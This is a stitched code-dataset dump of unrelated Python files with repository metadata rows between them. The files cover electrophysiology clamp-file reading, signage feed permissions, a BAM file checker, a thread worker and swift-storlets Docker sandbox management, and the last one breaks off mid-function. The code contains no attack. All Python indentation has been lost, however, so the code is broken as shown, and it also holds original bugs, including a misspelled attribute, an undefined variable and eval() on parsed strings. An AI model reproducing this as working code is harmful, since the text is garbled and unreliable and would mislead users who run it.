"""
if not isClampFile(data_handle):
raise Exception('%s not a clamp file.' % data_handle.shortName())
data = data_handle.read(readAllData=False)
info = data._info[-1]
d = {}
if 'ClampState' in info.keys() and 'ClampParams' in info['ClampState'].keys():
par = info['ClampState']['ClampParams']
d['WCCompValid'] = True
d['WCEnabled'] = par['WholeCellCompEnable']
d['WCResistance'] = par['WholeCellCompResist']
d['WCCellCap'] = par['WholeCellCompCap']
d['CompEnabled'] = par['RsCompEnable']
d['CompCorrection'] = par['RsCompCorrection']
d['CompBW'] = par['RsCompBandwidth']
return d
else:
return {'WCCompValid': False, 'WCEnable': 0, 'WCResistance': 0., 'WholeCellCap': 0.,
'CompEnable': 0, 'CompCorrection': 0., 'CompBW': 50000. }
def getSampleRate(data_handle):
"""given clamp data, return the data sampling rate """
if not isClampFile(data_handle):
raise Exception('%s not a clamp file.' % data_handle.shortName())
data = data_handle.read(readAllData=False)
info = data._info[-1]
if 'DAQ' in info.keys():
return(info['DAQ']['primary']['rate'])
else:
return(info['rate'])
def getDevices(protoDH):
"""
return a dictionary of all the (recognized) devices and their file handles in the protocol directory
This can be handy to check which devices were recorded during a protocol (the keys of the dictionary)
and for accessing the data (from the file handles)
pbm 5/2014
"""
if protoDH.name()[-8:] == 'DS_Store': ## OS X filesystem puts .DS_Store files in all directories
return None
files = protoDH.ls()
devList = {}
for devname in deviceNames.keys():
names = deviceNames[devname]
for n in names:
if n in files:
devList[n] = protoDH[n]
elif n+'.ma' in files:
devList[n] = protoDH[n+'.ma']
else:
pass
if len(devList) == 0:
return None
return devList
def getClampDeviceNames(protoDH):
"""
get the Clamp devices used in the current protocol
:param protoDH: handle to current protocol
:return clampDeviceNames: The names of the clamp devices used in this protocol, or None if no devices
"""
if protoDH.name()[-8:] == 'DS_Store': ## OS X filesystem puts .DS_Store files in all directories
return None
files = protoDH.ls()
clampDeviceNames = []
for knownDevName in deviceNames['Clamp']: # go through known devices
if knownDevName in files:
clampDeviceNames.append(knownDevName)
elif knownDevName+'.ma' in files:
clampDeviceNames.append(knownDevName)
else:
pass
if len(clampDeviceNames) == 0:
return None
return clampDeviceNames
def getNamedDeviceFile(protoDH, deviceName):
"""Given a protocol directory handle, return the requested device file handle within.
If there are multiple devices, only the first is returned.
Return None if no matching devices are found.
"""
if protoDH.name()[-8:] == 'DS_Store': ## OS X filesystem puts .DS_Store files in all directories
return None
if deviceName in deviceNames.keys():
names = deviceNames[deviceName]
else:
return None
files = protoDH.ls()
for n in names:
if n in files:
return protoDH[n]
if n+'.ma' in files:
return protoDH[n+'.ma']
return None
def getParentInfo(dh, parentType):
dh = getParent(dh, parentType)
if dh is None:
return None
else:
return dh.info()
def getDayInfo(dh):
return getParentInfo(dh, 'Day')
def getSliceInfo(dh):
return getParentInfo(dh, 'Slice')
def getCellInfo(dh):
return getParentInfo(dh, 'Cell')
def getACSF(dh):
dayInfo = getDayInfo(dh)
if dayInfo is not None:
return dayInfo.get('solution', '')
return None
def getInternalSoln(dh):
dayInfo = getDayInfo(dh)
if dayInfo is not None:
return dayInfo.get('internal', '')
return None
def getTemp(dh):
if dh.isFile():
dh = dh.parent()
temp = dh.info().get(('Temperature','BathTemp'), None)
if temp is None:
dayinfo = getDayInfo(dh)
if dayinfo is not None:
temp = getDayInfo(dh).get('temperature', '')
return temp
def getCellType(dh):
cellInfo = getCellInfo(dh)
if cellInfo is not None:
return cellInfo.get('type', '')
else:
return('Unknown')
def file_cell_protocol(filename):
"""
file_cell_protocol breaks the current filename down and returns a
tuple: (date, sliceid, cell, proto, parent directory)
last argument returned is the rest of the path...
"""
(p0, proto) = os.path.split(filename)
(p1, cell) = os.path.split(p0)
(p2, sliceid) = os.path.split(p1)
(parentdir, date) = os.path.split(p2)
return date, sliceid, cell, proto, parentdir
def cell_summary(dh, summary=None):
"""
cell_summary generates a dictionary of information about the cell
for the selected directory handle (usually a protocol; could be a file)
:param dh: the directory handle for the data, as passed to loadFileRequested
:return summary dictionary:
"""
# other info into a dictionary
if summary is None:
summary = {}
summary['Day'] = getDayInfo(dh)
summary['Slice'] = getSliceInfo(dh)
summary['Cell'] = getCellInfo(dh)
summary['ACSF'] = getACSF(dh)
summary['Internal'] = getInternalSoln(dh)
summary['Temperature'] = getTemp(dh)
summary['CellType'] = getCellType(dh)
today = summary['Day']
if today is not None:
if 'species' in today.keys():
summary['Species'] = today['species']
if 'age' in today.keys():
summary['Age'] = today['age']
if 'sex' in today.keys():
summary['Sex'] = today['sex']
if 'weight' in today.keys():
summary['Weight'] = today['weight']
if 'temperature' in today.keys():
summary['Temperature'] = today['temperature']
if 'description' in today.keys():
summary['Description'] = today['description']
else:
for k in ['species', 'age', 'sex', 'weight', 'temperature', 'description']:
summary[k] = None
if summary['Cell'] is not None:
ct = summary['Cell']['__timestamp__']
else:
ct = 0.
pt = dh.info()['__timestamp__']
summary['ElapsedTime'] = pt - ct # save elapsed time between cell opening and protocol start
(date, sliceid, cell, proto, parentdir) = file_cell_protocol(dh.name())
summary['CellID'] = os.path.join(date, sliceid, cell) # use this as the ID for the cell later on
summary['Protocol'] = proto
return summary
# noinspection PyPep8
class GetClamps():
"""
Convience class to read voltage and current clamp data from files, including collating data from
a protocol. The results are stored in class variables. Handles variations in file structure
from early versions of Acq4 including returning the stimulus waveforms.
This class will usually be called from the LoadFileRequested routine in an analysis module.
"""
def __init__(self):
pass
def getClampData(self, dh, pars=None):
"""
Read the clamp data - whether it is voltage or current clamp, and put the results
into our class variables.
dh is the file handle (directory)
pars is a structure that provides some control parameters usually set by the GUI
Returns a short dictionary of some values; others are accessed through the class.
Returns None if no data is found.
"""
pars = self.getParsDefaults(pars)
clampInfo = {}
if dh is None:
return None
dirs = dh.subDirs()
clampInfo['dirs'] = dirs
traces = []
cmd = []
cmd_wave = []
data = []
self.time_base = None
self.values = []
self.trace_StartTimes = np.zeros(0)
sequence_values = None
self.sequence = listSequenceParams(dh)
# building command voltages - get amplitudes to clamp
clamp = ('Clamp1', 'Pulse_amplitude')
reps = ('protocol', 'repetitions')
if clamp in self.sequence:
self.clampValues = self.sequence[clamp]
self.nclamp = len(self.clampValues)
if sequence_values is not None:
# noinspection PyUnusedLocal
sequence_values = [x for x in self.clampValues for y in sequence_values]
else:
sequence_values = [x for x in self.clampValues]
else:
sequence_values = []
# nclamp = 0
# if sequence has repeats, build pattern
if reps in self.sequence:
self.repc = self.sequence[reps]
self.nrepc = len(self.repc)
# noinspection PyUnusedLocal
sequence_values = [x for y in range(self.nrepc) for x in sequence_values]
# select subset of data by overriding the directory sequence...
dirs = []
###
### This is possibly broken -
###
###
ld = pars['sequence1']['index']
rd = pars['sequence2']['index']
if ld[0] == -1 and rd[0] == -1:
pass
else:
if ld[0] == -1: # 'All'
ld = range(pars['sequence2']['count'])
if rd[0] == -1: # 'All'
rd = range(pars['sequence2']['count'])
for i in ld:
for j in rd:
dirs.append('%03d_%03d' % (i, j))
### --- end of possibly broken section
for i, directory_name in enumerate(dirs): # dirs has the names of the runs withing the protocol
data_dir_handle = dh[directory_name] # get the directory within the protocol
try:
data_file_handle = getClampFile(data_dir_handle) # get pointer to clamp data
# Check if there is no clamp file for this iteration of the protocol
# Usually this indicates that the protocol was stopped early.
if data_file_handle is None:
print 'PatchEPhys/GetClamps: Missing data in %s, element: %d' % (directory_name, i)
continue
except:
raise Exception("Error loading data for protocol %s:"
% directory_name)
data_file = data_file_handle.read()
self.data_mode = getClampMode(data_file, dir_handle=dh)
if self.data_mode is None:
self.data_mode = ic_modes[0] # set a default mode
if self.data_mode in ['vc']: # should be "AND something" - this is temp fix for Xuying's old data
self.data_mode = vc_modes[0]
if self.data_mode in ['model_ic', 'model_vc']: # lower case means model was run
self.modelmode = True
# Assign scale factors for the different modes to display data rationally
if self.data_mode in ic_modes:
self.command_scale_factor = 1e12
self.command_units = 'pA'
elif self.data_mode in vc_modes:
self.command_units = 'mV'
self.command_scale_factor = 1e3
else: # data mode not known; plot as voltage
self.command_units = 'V'
self.command_scale_factor = 1.0
if pars['limits']:
cval = self.command_scale_factor * sequence_values[i]
cmin = pars['cmin']
cmax = pars['cmax']
if cval < cmin or cval > cmax:
continue # skip adding the data to the arrays
self.devicesUsed = getDevices(data_dir_handle)
self.clampDevices = getClampDeviceNames(data_dir_handle)
self.holding = getClampHoldingLevel(data_file_handle)
self.amplifierSettings = getWCCompSettings(data_file_handle)
self.clampState = getClampState(data_file_handle)
# print self.devicesUsed
cmd = getClampCommand(data_file)
data = getClampPrimary(data_file)
# store primary channel data and read command amplitude
info1 = data.infoCopy()
# we need to handle all the various cases where the data is stored in different parts of the
# "info" structure
if 'startTime' in info1[0].keys():
start_time = info1[0]['startTime']
elif 'startTime' in info1[1].keys():
start_time = info1[1]['startTime']
elif 'startTime' in info1[1]['DAQ']['command'].keys():
start_time = info1[1]['DAQ']['command']['startTime']
else:
start_time = 0.0
self.trace_StartTimes = np.append(self.trace_StartTimes, start_time)
traces.append(data.view(np.ndarray))
cmd_wave.append(cmd.view(np.ndarray))
# pick up and save the sequence values
if len(sequence_values) > 0:
self.values.append(sequence_values[i])
else:
self.values.append(cmd[len(cmd) / 2])
if traces is None or len(traces) == 0:
print "PatchEPhys/GetClamps: No data found in this run..."
return None
self.RSeriesUncomp = 0.
if self.amplifierSettings['WCCompValid']:
if self.amplfierSettings['WCEnabled'] and self.amplifierSettings['CompEnabled']:
self.RSeriesUncomp= self.amplfierSettings['WCResistance'] * (1.0 - self.amplifierSettings['CompCorrection'] / 100.)
else:
self.RSeriesUncomp = 0.
# put relative to the start
self.trace_StartTimes -= self.trace_StartTimes[0]
traces = np.vstack(traces)
self.cmd_wave = np.vstack(cmd_wave)
self.time_base = np.array(cmd.xvals('Time'))
self.commandLevels = np.array(self.values)
# set up the selection region correctly and
# prepare IV curves and find spikes
info = [
{'name': 'Command', 'units': cmd.axisUnits(-1),
'values': np.array(self.values)},
data.infoCopy('Time'),
data.infoCopy(-1)]
traces = traces[:len(self.values)]
self.traces = MetaArray(traces, info=info)
# sfreq = self.dataModel.getSampleRate(data_file_handle)
self.sample_interval = 1. / getSampleRate(data_file_handle)
vc_command = data_dir_handle.parent().info()['devices'][self.clampDevices[0]]
self.tstart = 0.01
self.tdur = 0.5
self.tend = 0.510
# print 'vc_command: ', vc_command.keys()
# print vc_command['waveGeneratorWidget'].keys()
if 'waveGeneratorWidget' in vc_command.keys():
# print 'wgwidget'
try:
vc_info = vc_command['waveGeneratorWidget']['stimuli']['Pulse']
# print 'stimuli/Pulse'
pulsestart = vc_info['start']['value']
pulsedur = vc_info['length']['value']
except KeyError:
try:
vc_info = vc_command['waveGeneratorWidget']['function']
# print 'function'
pulse = vc_info[6:-1].split(',')
pulsestart = eval(pulse[0])
pulsedur = eval(pulse[1])
except:
raise Exception('WaveGeneratorWidget not found')
pulsestart = 0.
pulsedur = np.max(self.time_base)
elif 'daqState' in vc_command:
# print 'daqstate'
vc_state = vc_command['daqState']['channels']['command']['waveGeneratorWidget']
func = vc_state['function']
if func == '': # fake values so we can at least look at the data
pulsestart = 0.01
pulsedur = 0.001
else: # regex parse the function string: pulse(100, 1000, amp)
pulsereg = re.compile("(^pulse)\((\d*),\s*(\d*),\s*(\w*)\)")
match = pulsereg.match(func)
g = match.groups()
if g is None:
raise Exception('PatchEPhys/GetClamps cannot parse waveGenerator function: %s' % func)
pulsestart = float(g[1]) / 1000. # values coming in are in ms, but need s
pulsedur = float(g[2]) / 1000.
else:
raise Exception("PatchEPhys/GetClamps: cannot find pulse information")
# adjusting pulse start/duration is necessary for early files, where the values
# were stored as msec, rather than sec.
# we do this by checking the values against the time base itself, which is always in seconds.
# if they are too big, we guess (usually correctly) that the values are in the wrong units
if pulsestart + pulsedur > np.max(self.time_base):
pulsestart *= 1e-3
pulsedur *= 1e-3
cmdtimes = np.array([pulsestart, pulsedur])
if pars['KeepT'] is False: # update times with current times.
self.tstart = cmdtimes[0] # cmd.xvals('Time')[cmdtimes[0]]
self.tend = np.sum(cmdtimes) # cmd.xvals('Time')[cmdtimes[1]] + self.tstart
self.tdur = self.tend - self.tstart
clampInfo['PulseWindow'] = [self.tstart, self.tend, self.tdur]
# print 'start/end/dur: ', self.tstart, self.tend, self.tdur
# build the list of command values that are used for the fitting
clampInfo['cmdList'] = []
for i in range(len(self.values)):
clampInfo['cmdList'].append('%8.3f %s' %
(self.command_scale_factor * self.values[i], self.command_units))
if self.data_mode in vc_modes:
self.spikecount = np.zeros(len(np.array(self.values)))
return clampInfo
def getParsDefaults(self, pars):
"""
pars is a dictionary that defines the special cases for getClamps.
Here, given the pars dictionary that was passed to getClamps, we make sure that all needed
elements are present, and substitute logical values for those that are missing
:returns: updated pars dictionary
"""
if pars is None:
pars = {}
# neededKeys = ['limits', 'cmin', 'cmax', 'KeepT', 'sequence1', 'sequence2']
# hmm. could do this as a dictionary of value: default pairs and a loop
k = pars.keys()
if 'limits' not in k:
pars['limits'] = False
if 'cmin' not in k:
pars['cmin'] = -np.inf
pars['cmax'] = np.inf
if 'KeepT' not in k:
pars['KeepT'] = False
# sequence selections:
# pars[''sequence'] is a dictionary
# The dictionary has 'index' (currentIndex()) and 'count' from the GUI
if 'sequence1' not in k:
pars['sequence1'] = {'index': 0} # index of '0' is "All"
pars['sequence1']['count'] = 0
if 'sequence2' not in k:
pars['sequence2'] = {'index': 0}
pars['sequence2']['count'] = 0
return pars
|
mit
| 6,986,205,411,136,417,000 | 38.455324 | 131 | 0.58452 | false |
danthedeckie/streetsign
|
streetsign_server/logic/feeds_and_posts.py
|
1
|
5888
|
# -*- coding: utf-8 -*-
# StreetSign Digital Signage Project
# (C) Copyright 2013 Daniel Fairhead
#
# StreetSign is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# StreetSign is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with StreetSign. If not, see <http://www.gnu.org/licenses/>.
#
# -------------------------------
"""
---------------------------------------
streetsign_server.logic.feeds_and_posts
---------------------------------------
logic for feeds_and_posts views, separated out for clarity.
"""
from datetime import datetime
from flask import flash, url_for, json
from streetsign_server.views.utils import PleaseRedirect, \
getstr, getint, getbool, \
STRIPSTR, DATESTR
from streetsign_server.models import Feed, now
def try_to_set_feed(post, new_feed_id, user):
''' Is this user actually allowed to set the feed of this post to what
the form is saying they want to? If so, cool. Return that feed. '''
try:
if post.feed:
oldfeedid = post.feed.id
else:
oldfeedid = False
except:
oldfeedid = False
if new_feed_id and new_feed_id != oldfeedid:
# new or changed feed.
try:
feed = Feed.get(Feed.id == new_feed_id)
except Feed.DoesNotExist:
raise PleaseRedirect(None,
"Odd. You somehow tried to post "
"to a non-existant feed. It didn't work.")
if feed.user_can_write(user):
flash('Posted to ' + feed.name)
return feed
else:
# This shouldn't happen very often - so don't worry about
# losing post data. If it's an issue, refactor so it's stored
# but not written to the feed...
raise PleaseRedirect(
url_for('index'),
"Sorry, you don't have permission to write to " + feed.name)
return feed
return post.feed
def if_i_cant_write_then_i_quit(post, user):
''' checks if a post is editable by a user. If it isn't, for
whatever reason, then raise an appropriate 'PleaseRedirect'
exception. (reasons could be that it's in a feed we don't
have write access to, or it's been published, and we don't
have publish permission to that feed, so the post is now
'locked' to us.) '''
# if we don't have write permission, then this isn't our post!
if not post.feed.user_can_write(user):
raise PleaseRedirect(
None,
"Sorry, this post is in feed '{0}', which"
" you don't have permission to post to."
" Edit cancelled.".format(post.feed.name))
# if this post is already published, be careful about editing it!
if post.published and not post.feed.user_can_publish(user):
raise PleaseRedirect(
None,
'Sorry, this post is published,'
' and you do not have permission to'
' edit published posts in "{0}".'.format(post.feed.name))
return True
def can_user_write_and_publish(user, post):
''' returns a tuple, expressing if 'user' has permission to
write and publish a post. '''
if not post.feed:
if user.writeable_feeds():
return True, False
else: # there is a feed selected
if post.feed.user_can_write(user):
if post.feed.user_can_publish(user):
return True, True
else:
return True, False
# default is secure:
return False, False
def clean_date(in_text):
''' take some input text, and return a datetime, if possible. '''
return datetime.strptime(in_text.split('.')[0], "%Y-%m-%d %H:%M:%S")
def post_form_intake(post, form, editor):
''' takes the values from 'form', passes the post contents to
the editor 'receive' function, and adds all the values into
the 'post' object.
NOTE: this actually modifies the post it is sent!
'''
post.content = json.dumps(editor.receive(form))
post.status = 0 # any time a post is edited, remove it from archive.
post.time_restrictions_show = \
(form.get('times_mode', 'do_not_show') == 'only_show')
post.time_restrictions = form.get('time_restrictions_json', '[]')
post.display_time = \
getint('displaytime', 8, minimum=2, maximum=100, form=form)
print(type(form['active_start']))
post.active_start = \
getstr('active_start', post.active_start, validate=DATESTR, form=form)
print(type(post.active_start))
post.active_end = \
getstr('active_end', post.active_end, validate=DATESTR, form=form)
post.write_date = now()
def delete_post_and_run_callback(post, typemodule):
''' before a post is actually deleted, check if there is a 'pre-delete'
callback on this post type, and run that first. This way, for uploaded
images (for instance), the file can be deleted as well. '''
try:
typemodule.delete(json.loads(post.content))
except AttributeError as excp:
pass
# There's no callback for this posttype, which is fine.
# most post types will store no external data, and so don't need
# to do anything.
except Exception as excp:
flash(str(excp))
return post.delete_instance()
|
gpl-3.0
| -3,678,719,408,436,776,400 | 34.257485 | 79 | 0.60411 | false |
ngsutils/ngsutils
|
ngsutils/bam/check.py
|
1
|
1354
|
#!/usr/bin/env python
## category Misc
## desc Checks a BAM file for corruption
'''
Checks a BAM file for corruption
'''
import sys
import os
import ngsutils.bam
def bam_check(fname, quiet=False):
if not quiet:
sys.stdout.write('%s: ' % fname)
sys.stdout.flush()
fail = False
i = 1
try:
bamfile = ngsutils.bam.bam_open(fname)
for read in ngsutils.bam.bam_iter(bamfile):
i += 1
pass
bamfile.close()
except KeyboardInterrupt:
if not quiet:
sys.stdout.write('\n')
sys.exit(-1)
except:
fail = True
pass
if fail:
if not quiet:
sys.stdout.write('ERROR! (line %s)\n' % (i + 1))
return False
if not quiet:
sys.stdout.write('OK\n')
return True
def usage():
print __doc__
print "Usage: bamutils check bamfile..."
sys.exit(-1)
if __name__ == "__main__":
fnames = []
for arg in sys.argv[1:]:
if arg == "-h":
usage()
elif os.path.exists(arg):
fnames.append(arg)
else:
sys.stderr.write("File: %s not found!\n" % arg)
usage()
if not fnames:
usage()
fail = False
for f in fnames:
if not bam_check(f):
fail = True
if fail:
sys.exit(1)
|
bsd-3-clause
| 1,421,671,888,555,323,100 | 18.623188 | 60 | 0.512555 | false |
jmercier/Codebench
|
threads.py
|
1
|
2394
|
import threading
import Queue
import traceback
from functools import wraps
class Worker(threading.Thread):
stopevent = False
def __init__(self, *args, **kw):
threading.Thread.__init__(self, *args, **kw)
self.q = Queue.Queue()
self.start()
def run(self):
o = self.q.get()
while not self.stopevent:
fct, args, kw, evt = o
try:
fct(*args, **kw)
except:
traceback.print_exc()
finally:
if evt is not None:
evt.set()
o = self.q.get()
q = self.q
self.q = None
fct, args, kw, evt = o
if evt is not None:
evt.set()
while not q.empty():
fct, args, kw, evt = q.get()
if evt is not None:
evt.set()
def __callInThread__(self, fct, args, kw, evt):
if not callable(fct):
raise RuntimeError("first argument must be callable")
if self.q is None:
return
self.q.put((fct, args, kw, evt))
def __call__(self, fct, *args, **kw):
self.__callInThread__(fct, args, kw, None)
def blockingCall(self, fct, *args, **kw):
evt = threading.Event()
self.__callInThread__(fct, args, kw, evt)
evt.wait()
def stop(self, join = True):
self.stopevent = True
if self.q is not None and self.q.empty():
self.q.put((None, None, None, None))
self.join()
class inworker(object):
"""
If your application have "inworker" thread you should
clean the worker threads by calling the cleanup function
"""
workers = {}
worker = None
def __init__(self, name, worker_type = Worker):
self.name = name
self.worker_type = worker_type
def __call__(self, fct):
@wraps(fct)
def wrapper(*args, **kw):
if self.worker is None:
self.worker = self.worker_type()
self.workers[self.name] = self.worker
self.worker(fct, *args, **kw)
return wrapper
@classmethod
def cleanup(cls):
while len(cls.workers) != 0:
n, w = cls.workers.popitem()
w.stop()
try:
import pycuda.driver as drv
import pycuda.tools
drv.init()
class CudaWorker(Worker):
def __init__(self, deviceId = None):
self.deviceId = deviceId
def run(self):
if deviceId is None:
dev = pycuda.tools.get_default_device()
else:
pass
ctx = dev.make_context()
Worker.run(self)
ctx.pop()
incuda = inworker("cuda", worker_type = CudaWorker)
except:
traceback.print_exc()
|
mit
| -5,936,050,376,260,728,000 | 22.70297 | 68 | 0.597744 | false |
Open-I-Beam/swift-storlets
|
Engine/swift/storlet_gateway/storlet_runtime.py
|
1
|
24362
|
'''-------------------------------------------------------------------------
Copyright IBM Corp. 2015, 2015 All Rights Reserved
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
Limitations under the License.
-------------------------------------------------------------------------'''
'''
Created on Feb 10, 2015
@author: eranr
'''
import os
import time
import stat
import select
import commands
import eventlet
from eventlet.timeout import Timeout
import json
import shutil
import sys
from swift.common.constraints import MAX_META_OVERALL_SIZE
from swift.common.swob import HTTPBadRequest, Request,\
HTTPInternalServerError
from SBusPythonFacade.SBus import *
from SBusPythonFacade.SBusDatagram import *
from SBusPythonFacade.SBusStorletCommand import *
from SBusPythonFacade.SBusFileDescription import *
from storlet_middleware.storlet_common import StorletLogger
eventlet.monkey_patch()
'''---------------------------------------------------------------------------
Sandbox API
'''
class RunTimePaths():
'''
The Storlet Engine need to be access stuff located in many paths:
1. The various communication channels represented as pipes in the filesystem
2. Directories where to place Storlets
3. Directories where to place logs
Communication channels
----------------------
The RunTimeSandbox communicates with the Sandbox via two types of pipes
1. factory pipe - defined per account, used for communication with the sandbox
for e.g. start/stop a storlet daemon
2. Storlet pipe - defined per account and Storlet, used for communication
with a storlet daemon, e.g. to call the invoke API
Each pipe type has two paths:
1. A path that is inside the sandbox
2. A path that is outside of the sandbox or at the host side. As such
this path is prefixed by 'host_'
Thus, we have the following 4 paths of interest:
1. sandbox_factory_pipe_path
2. host_factory_pipe_path
3. sandbox_storlet_pipe_path
4. host_storlet_pipe_path
Our implementation uses the following path structure for the various pipes:
In the host, all pipes belonging to a given account are prefixed by
<pipes_dir>/<account>, where <pipes_dir> comes from the configuration
Thus:
host_factory_pipe_path is of the form <pipes_dir>/<account>/factory_pipe
host_storlet_pipe_path is of the form <pipes_dir>/<account>/<storlet_id>
In The sandbox side
sandbox_factory_pipe_path is of the form /mnt/channels/factory_pipe
sandbox_storlet_pipe_path is of the form /mnt/channels/<storlet_id>
Storlets Locations
------------------
The Storlet binaries are accessible from the sandbox using a mounted directory.
This directory is called the storlet directories.
On the host side it is of the form <storlet_dir>/<account>/<storlet_name>
On the sandbox side it is of the form /home/swift/<storlet_name>
<storlet_dir> comes from the configuration
<storlet_name> is the prefix of the jar.
Logs
----
Logs are located in paths of the form:
<log_dir>/<account>/<storlet_name>.log
'''
def __init__(self, account, conf):
self.account = account
self.scope = account[5:18]
self.host_restart_script_dir = conf['script_dir']
self.host_pipe_root = conf['pipes_dir']
self.factory_pipe_suffix = 'factory_pipe'
self.sandbox_pipe_prefix = '/mnt/channels'
self.storlet_pipe_suffix = '_storlet_pipe'
self.sandbox_storlet_dir_prefix = '/home/swift'
self.host_storlet_root = conf['storlets_dir']
self.host_log_path_root = conf['log_dir']
self.host_cache_root = conf['cache_dir']
self.storlet_container = conf['storlet_container']
self.storlet_dependency = conf['storlet_dependency']
def host_pipe_prefix(self):
return os.path.join(self.host_pipe_root, self.scope)
def create_host_pipe_prefix(self):
path = self.host_pipe_prefix()
if not os.path.exists(path):
os.makedirs(path)
# 0777 should be 0700 when we get user namespaces in Docker
os.chmod(path, stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO)
def host_factory_pipe(self):
return os.path.join(self.host_pipe_prefix(),
self.factory_pipe_suffix)
def host_storlet_pipe(self, storlet_id):
return os.path.join(self.host_pipe_prefix(),
storlet_id)
def sbox_storlet_pipe(self, storlet_id):
return os.path.join(self.sandbox_pipe_prefix,
storlet_id)
def sbox_storlet_exec(self, storlet_id):
return os.path.join(self.sandbox_storlet_dir_prefix, storlet_id)
def host_storlet_prefix(self):
return os.path.join(self.host_storlet_root, self.scope)
def host_storlet(self, storlet_id):
return os.path.join(self.host_storlet_prefix(), storlet_id)
def slog_path(self, storlet_id):
log_dir = os.path.join(self.host_log_path_root, self.scope, storlet_id)
if not os.path.exists(log_dir):
os.makedirs(log_dir)
return log_dir
def get_host_storlet_cache_dir(self):
return os.path.join(self.host_cache_root, self.scope,self.storlet_container)
def get_host_dependency_cache_dir(self):
return os.path.join(self.host_cache_root, self.scope,self.storlet_dependency)
'''---------------------------------------------------------------------------
Docker Stateful Container API
The RunTimeSandbox serve as an API between the Docker Gateway and
a re-usable per account sandbox
---------------------------------------------------------------------------'''
class RunTimeSandbox():
'''
The RunTimeSandbox represents a re-usable per account sandbox. The sandbox
is re-usable in the sense that it can run several storlet daemons.
The following methods are supported:
ping - pings the sandbox for liveness
wait - wait for the sandbox to be ready for processing commands
restart - restart the sandbox
start_storlet_daemon - start a daemon for a given storlet
stop_storlet_daemon - stop a daemon of a given storlet
get_storlet_daemon_status - test if a given storlet daemon is running
'''
def __init__(self, account, conf, logger):
self.paths = RunTimePaths(account, conf)
self.account = account
self.sandbox_ping_interval = 0.5
self.sandbox_wait_timeout = int(conf['restart_linux_container_timeout'])
self.docker_repo = conf['docker_repo']
self.docker_image_name_prefix = 'tenant'
# TODO: should come from upper layer Storlet metadata
self.storlet_language = 'java'
# TODO: add line in conf
self.storlet_daemon_thread_pool_size = int(conf.get('storlet_daemon_thread_pool_size',5))
self.storlet_daemon_debug_level = conf.get('storlet_daemon_debug_level','TRACE')
# TODO: change logger's route if possible
self.logger = logger
def _parse_sandbox_factory_answer(self, str_answer):
two_tokens = str_answer.split(':', 1)
b_success = False
if two_tokens[0] == 'True':
b_success = True
return b_success, two_tokens[1]
def ping(self):
pipe_path = self.paths.host_factory_pipe()
read_fd, write_fd = os.pipe()
dtg = SBusDatagram.create_service_datagram( SBUS_CMD_PING, write_fd )
rc = SBus.send( pipe_path, dtg )
if (rc < 0):
return -1
reply = os.read(read_fd,10)
os.close(read_fd)
os.close(write_fd)
res, error_txt = self._parse_sandbox_factory_answer(reply)
if res == True:
return 1
return 0
def wait(self):
do_wait = True
up = 0
to = Timeout(self.sandbox_wait_timeout)
try:
while do_wait == True:
rc = self.ping()
if (rc != 1):
time.sleep(self.sandbox_ping_interval)
continue
else:
to.cancel()
do_wait = False
up = 1
except Timeout as t:
self.logger.info("wait for sandbox %s timedout" % self.account)
do_wait = False
finally:
to.cancel()
return up
def restart(self):
'''
Restarts the account's sandbox
Returned value:
True - If the sandbox was started successfully
False - Otherwise
'''
# Extract the account's ID from the account
if self.account.lower().startswith('auth_'):
account_id = self.account[len('auth_'):]
else:
account_id = self.account
self.paths.create_host_pipe_prefix()
docker_container_name = '%s_%s' % (self.docker_image_name_prefix,
account_id)
docker_image_name = '%s/%s' % (self.docker_repo,account_id)
pipe_mount = '%s:%s' % (self.paths.host_pipe_prefix(),
self.paths.sandbox_pipe_prefix)
storlet_mount = '%s:%s' % (self.paths.host_storlet_prefix(),
self.paths.sandbox_storlet_dir_prefix)
cmd = '%s/restart_docker_container %s %s %s %s' % (
self.paths.host_restart_script_dir,
docker_container_name,
docker_image_name,
pipe_mount,
storlet_mount)
res = commands.getoutput(cmd)
return self.wait()
def start_storlet_daemon(self, spath, storlet_id):
prms = {}
prms['daemon_language'] = 'java'
prms['storlet_path'] = spath
prms['storlet_name'] = storlet_id
prms['uds_path'] = self.paths.sbox_storlet_pipe(storlet_id)
prms['log_level'] = self.storlet_daemon_debug_level
prms['pool_size'] = self.storlet_daemon_thread_pool_size
read_fd, write_fd = os.pipe()
dtg = SBusDatagram.create_service_datagram( SBUS_CMD_START_DAEMON,
write_fd )
dtg.set_exec_params( prms )
pipe_path = self.paths.host_factory_pipe()
rc = SBus.send( pipe_path, dtg )
if (rc < 0):
return -1
reply = os.read(read_fd,10)
os.close(read_fd)
os.close(write_fd)
res, error_txt = self._parse_sandbox_factory_answer(reply)
if res == True:
return 1
return 0
def stop_storlet_daemon(self, storlet_id):
read_fd, write_fd = os.pipe()
dtg = SBusDatagram.create_service_datagram( SBUS_CMD_STOP_DAEMON,
write_fd )
dtg.add_exec_param('storlet_name', storlet_id)
pipe_path = self.paths.host_factory_pipe()
rc = SBus.send( pipe_path, dtg )
if (rc < 0):
self.logger.info("Failed to send status command to %s %s" % (self.account, storlet_id))
return -1
reply = os.read(read_fd,10)
os.close(read_fd)
os.close(write_fd)
res, error_txt = self._parse_sandbox_factory_answer(reply)
if res == True:
return 1
return 0
def get_storlet_daemon_status(self, storlet_id):
read_fd, write_fd = os.pipe()
dtg = SBusDatagram.create_service_datagram( SBUS_CMD_DAEMON_STATUS,
write_fd )
dtg.add_exec_param( 'storlet_name', storlet_id)
pipe_path = self.paths.host_factory_pipe()
rc = SBus.send(pipe_path, dtg)
if (rc < 0):
self.logger.info("Failed to send status command to %s %s" % (self.account, storlet_id))
return -1
reply = os.read(read_fd,10)
os.close(read_fd)
os.close(write_fd)
res, error_txt = self._parse_sandbox_factory_answer(reply)
if res == True:
return 1
return 0
def activate_storlet_daemon(self, invocation_data, cache_updated = True):
storlet_daemon_status = self.get_storlet_daemon_status(invocation_data['storlet_main_class'])
if (storlet_daemon_status == -1):
# We failed to send a command to the factory.
